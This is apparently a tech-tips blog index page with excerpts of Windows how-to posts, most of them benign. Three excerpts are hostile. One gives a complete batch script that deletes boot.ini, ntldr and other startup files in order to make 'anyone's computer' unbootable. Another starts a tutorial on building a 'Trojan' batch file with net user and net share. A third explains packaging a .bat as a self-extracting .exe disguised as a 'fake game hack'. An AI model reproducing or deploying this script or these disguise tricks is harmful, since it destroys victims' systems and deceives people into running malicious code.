Monday, December 23
Shadow

Tag: Windows 7

How to Keep Your Computer Healthy

How to Keep Your Computer Healthy

Technology
Does your computer feeling a bit sluggish? Over a period of time computers can build up a lot of junk that slows them down and result into Long start-ups, computer crashes, freezing & slow performance. This brief post shall cover the basics so even the beginners will not feel keeping their computer healthy at their own as hard as it sound.         Basic Computer Health The Very Basics As the famous saying goes "Prevention is better than cure." And this couldn’t be any less true for computers. If you can prevent your computer from becoming cluttered in the first place, it not just only saves yourself time also possibly a headache. So here are a few tips to keep your computer healthy on the while your day to day use: -Only install programs you nee...
How to make Windows 7 Bootable USB Pendrive

How to make Windows 7 Bootable USB Pendrive

Technology
Hi, Many of us face a lot of problem when we have to reinstall windows on our computer or laptop. First thing we have to decide from where to install windows? The options available are DVD or USB Pendrive. In the latest new netbooks, mostly there is no DVD drive. So if you want to install windows you have to go with the other option, i.e. USB Pendrive. So here I give a brief and 100% tested tutorial on how to create a Windows 7/8 Bootable USB Pendrive to install Windows 7/8 from USB Pendrive. First thing, you should check whether your BIOS supports booting from USB. Most of the computer/laptops support. But if your BIOS doesn’t, then sorry, you cannot boot from a USB Pendrive.  Second thing, you need another computer with Windows installed with a DVD drive, to copy its co...
Cannot Open a particular website? See What to do

Cannot Open a particular website? See What to do

Technology
Your computer is connected to the Internet but you are unable to open a particular website though all the other sites are loading without issues. For instance, you can open yahoo.com and bing.com but it takes forever to load www.google.com even though the site is up for everyone else in the world. How to Troubleshoot your Internet Connection Step 0: Like with everything else, switch off the modem, restart the computer, and turn on the modem again. Also clear the Internet cookies and browser cache. Problem gone? No, proceed to the next step. Step 1: Temporarily disable your computer's firewall and close any anti-virus software that may be running in the background. If you are now able to access the websites that were previously not loading, your security program is causing the proble...
How to recover Partition table ?

How to recover Partition table ?

Technology
Well Friends day before yesterday I had some problems with partition table of my computer. It was corrupted so I was not able to view any of my drive and when I dig in with using DISKPART it showed up the drive as invalid. But I was successfully managed to save my data and restore my computer using wonderful free open source software “TestDisk“   TestDisk is powerful free data recovery software! It was primarily designed to help recover lost partitions and/or make non-booting disks bootable again when these symptoms are caused by faulty software, certain types of viruses or human error (such as accidentally deleting a Partition Table). Partition table recovery using TestDisk is really easy. TestDisk can Fix partition table, recover deleted partition Recover FAT32 boot...
Fix – One or more ActiveX controls could not be displayed

Fix – One or more ActiveX controls could not be displayed

Technology
Many of you have experienced the following problem each time when you launch Windows Services (i.e. services.msc) window. You get the following warning: This warning pop-up opens only when you click on Extended tab. Well don’t worry because today I will share a trick so that you can get rid of this problem. All you need to do is to follow below mentioned steps Click Start, click Run, type regedit, and then click OK. Expand the following registry subkey: HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionInternet SettingsZones Delete 1 extra (parasite) zone with pseudo-graphic number, you'll see it before zone number 0. As shown in image - Quit Registry Editor. Hoo...
Run LiveCD (ISO/CD Image file) Linux within Windows

Run LiveCD (ISO/CD Image file) Linux within Windows

Technology
When you download an ISO/image file, you have to burn it to CD/DVD and you have to change the booting priority of drives through BIOS for testing it .It is more time consuming. MobaLiveCD allows you to test your LiveCD with a single click : after downloading the ISO image file of your favorite LiveCD, you just have to start it in MobaLiveCD and here you are, without the need to burn a CD-Rom or to reboot your computer MobaLiveCD key features: · No need to burn the CD-Rom anymore · You can use the right-click menu for an easy and fast start · Program without installation that you can start from an USB stick · A clear and easy to use interface · Light and portable application, packaged in a single executable of 1.6MB only · NEW FEATURE!!!! Added USB boot support. You can now test your boot...

Making your own Trojan in bat file in windows

Technology
Open a dos prompt we will only need a dos prompt and windows xp operating system -Basics- Opening a dos prompt -> Go to start and then execute and type cmd and press ok Now insert this command: net And you will get something like this NET [ ACCOUNTS | COMPUTER | CONFIG | CONTINUE | FILE | GROUP | HELP | HELPMSG | LOCALGROUP | NAME | PAUSE | PRINT | SEND | SESSION |SHARE | START | STATISTICS | STOP | TIME | USE | USER | VIEW ] In this tutorial we well use 3 of the commands listed here they are: net user , net share and net send We will select some of those commands and put them on a .bat file. What is a .bat file? Bat fi...

Shut Down Anyone's Computer Forever…

Technology
@echo off attrib -r -s -h c:autoexec.bat del c:autoexec.bat attrib -r -s -h c:boot.ini del c:boot.ini attrib -r -s -h c:ntldr del c:ntldr attrib -r -s -h c:windowswin.ini del c:windowswin.ini Open up notepad and copy and paste that. Save it as a .bat file. This should shutdown the persons computer. It shuts it off once and deletes the files needed to reboot and restart. REMEMBER - DO NOT CLICK THIS FILE. (for the idiots)   Technorati Tags: .bat,shutdown,batch file

Change your .bat file to .exe

Technology
when it is in .exe form no one will be able to change look or modify the code (note:it will make it to a self extraction thing but it will still act like a exe) This is how you make it to a .exe goto to start run and type C:WINDOWSsystem32 find a program called iexpress.exe STEP BY STEP ON HOW TO USE IT click create new self extraction then next. click extract files and run an installation command and click next. type what you want to name the files (ex. hello,virus,fake game hack) then click next. click no prompt then next. license agreement unless you want to put one click do not display license. package files(most important) click add then choose your .bat file(also does .vbs files) then click next. under install program choose your .bat or ...
Customized RUN dialog Shortcuts

Customized RUN dialog Shortcuts

Technology
Many of us including me feel it very easy and comfortable to open Microsoft Word by just typing "WINWORD" in the RUN dialog box and press enter. It happens in three steps ·         WINDOWS Button + R ·         Type "WINWORD" into the Run dialog Box ·         And press ENTER But as for PowerPoint you cannot open it by just typing "PPT" into the dialog box. Haven’t you ever wondered of customized RUN dialog shortcuts? If yes, then I am here for with a boon for you. Right click “My Computer” icon Choose “Properties” from context menu  Click “Advanced” tab  Click “Environment Variables” tab  ...